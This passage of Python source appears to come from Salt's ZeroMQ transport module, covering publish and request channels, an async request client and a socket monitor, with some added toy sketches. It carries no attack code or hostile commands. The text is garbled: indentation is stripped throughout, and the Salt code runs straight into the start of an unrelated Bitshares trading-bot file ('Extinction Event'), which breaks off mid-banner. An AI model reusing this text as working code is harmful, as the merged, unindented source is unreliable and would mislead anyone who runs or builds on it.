Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
if self.opts.get('__role') == 'syndic':
self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
else:
self._socket.setsockopt(
zmq.SUBSCRIBE,
salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'])
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts['recon_default'] + self.opts['recon_max']
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get('publish_port', 4506)) != 4506:
self.publish_port = self.opts.get('publish_port')
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds['publish_port']
log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return _get_master_uri(self.opts['master_ip'],
self.publish_port,
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_publish_port'))
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then it's the old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (self.opts.get('__role') != 'syndic' and message_target not in ('broadcast', self.hexid)) or \
(self.opts.get('__role') == 'syndic' and message_target not in ('broadcast', 'syndic')):
log.debug('Publish received for not this minion: %s', message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub '
'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin,
salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.process.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, '_monitor', None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, '_w_monitor', None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
'''
Starts ZMQ monitor for debugging purposes.
:return:
'''
# Socket monitor shall be used only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
log.debug('Starting ZMQ monitor')
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug('ZMQ monitor has been started')
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket %s', self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load'))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
its host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on %s', pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug('Publish daemon getting data from puller %s', pull_uri)
package = pull_sock.recv()
log.debug('Publish daemon received payload. size=%d', len(package))
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
log.trace('Accepted unpacked package from puller')
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
log.trace('Sending filtered data over publisher %s', pub_uri)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(salt.utils.stringutils.to_bytes(topic)).hexdigest())
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent')
# Syndic broadcast
if self.opts.get('order_masters'):
log.trace('Sending filtered data to syndic')
pub_sock.send(b'syndic', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Filtered data has been sent to syndic')
# otherwise it's a broadcast
else:
# TODO: constants file for "broadcast"
log.trace('Sending broadcasted data over publisher %s', pub_uri)
pub_sock.send(b'broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace('Broadcasted data has been sent')
else:
log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri)
pub_sock.send(payload)
log.trace('Unfiltered data has been sent')
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except KeyboardInterrupt:
log.trace('Publish daemon caught KeyboardInterrupt, tearing down')
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
'''
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
'''
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
'''
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
'''
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
'''
Disconnect an existing publisher socket and remove it from the local
thread's cache.
'''
if hasattr(self._sock_data, 'sock'):
self._sock_data.sock.close()
delattr(self._sock_data, 'sock')
def publish(self, load):
'''
Publish "load" to minions. This send the load to the publisher daemon
process with does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of minions through so zmq can target them
int_payload['topic_lst'] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
'Sending payload to publish daemon. jid=%s size=%d',
load.get('jid', None), len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug('Sent payload to publish daemon.')
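# Illustrative shape of the intermediate payload built by publish() above
# (values are hypothetical):
#   int_payload = {
#       'payload': serial.dumps({'enc': 'aes', 'load': '<encrypted load>', 'sig': '<optional signature>'}),
#       'topic_lst': ['minion-1', 'minion-2'],  # only for 'list' targets or zmq_filtering matches
#   }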
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class around AsyncReqMessageClient to avoid blocking while waiting to write data to the socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
self._closing = False
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
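# ----------------------------------------------------------------------
# Illustrative sketch (not part of Salt): AsyncReqMessageClientPool.send()
# above picks whichever wrapped client currently has the shortest
# send_queue, so slow requests pile up on as few sockets as possible.
# The same least-loaded selection with a hypothetical client type:
class _ExampleClient(object):
    def __init__(self):
        self.send_queue = []

    def send(self, message):
        self.send_queue.append(message)
        return message

def _example_least_loaded_send(clients, message):
    '''Dispatch message to the client with the fewest queued sends.'''
    target = min(clients, key=lambda client: len(client.send_queue))
    return target.send(message)
# ----------------------------------------------------------------------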
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The zmq address to connect to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'stream') and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug('Trying to connect to: %s', self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timed out
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug('Re-init ZMQ socket: %s', err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't already timed out
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the reply may already have arrived (resolving the
# future) by the time we time it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
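# ----------------------------------------------------------------------
# Illustrative sketch (not part of Salt): AsyncReqMessageClient above
# works around ZMQ REQ/REP's strict send-then-recv ordering by queueing
# outgoing messages and completing one future per message as replies
# arrive. The toy class below shows the queue-plus-future idea
# synchronously, without the tornado IOLoop, serialization, or the
# timeout/retry handling; all names are hypothetical.
from collections import deque
from concurrent.futures import Future

class _ExampleSerialRequestQueue(object):
    def __init__(self, transport):
        # transport: any callable that takes a request and returns a reply
        self.transport = transport
        self.pending = deque()

    def send(self, message):
        '''Queue a message and return a future for its eventual reply.'''
        future = Future()
        self.pending.append((message, future))
        return future

    def pump(self):
        '''Process queued requests strictly one at a time.'''
        while self.pending:
            message, future = self.pending.popleft()
            try:
                future.set_result(self.transport(message))
            except Exception as exc:  # pylint: disable=broad-except
                future.set_exception(exc)
# ----------------------------------------------------------------------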
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: %s", evt)
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
EV0.00000005.py
' litepresence 2018 '
def WTFPL_v0_March_1765():
if any([stamps, licenses, taxation, regulation, fiat, etat]):
try:
print('no thank you')
except:
return [tar, feathers]
# dependencies
import matplotlib
import numpy as np
from tkinter import *
# pybitshares modules
from bitshares import BitShares
from bitshares.market import Market
from bitshares.account import Account
from bitshares.blockchain import Blockchain
# standard python modules
import os
import sys
import json
import time
import math
import warnings
import requests
import websocket
import traceback
from getpass import getpass
from datetime import datetime
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
import matplotlib.dates as mdates
from ast import literal_eval as literal
from statistics import mean, median, mode
from random import random, shuffle, randint
from multiprocessing import Process, Value, Array
# Google Agorism
SATOSHI = 0.00000001
ANTISAT = 1 / SATOSHI
def banner():
print("\033c")
print('''
# EXTINCTION EVENT
# Backtesting and Live Algo Trading Framework for Bitshares DEX
' (BTS) litepresence1 '
v0.00000005_beta
Ensure what I want happens,
when I want it to happen,
and assure me it actually happened.
* featuring trustless client side Bitshares public node access *
Installation:
https://github.com/litepresence/extinction-event/blob/master/README.md
''')
time.sleep(0)
print("\033c")
print('''
Bitshares Decentralized Development April 2018
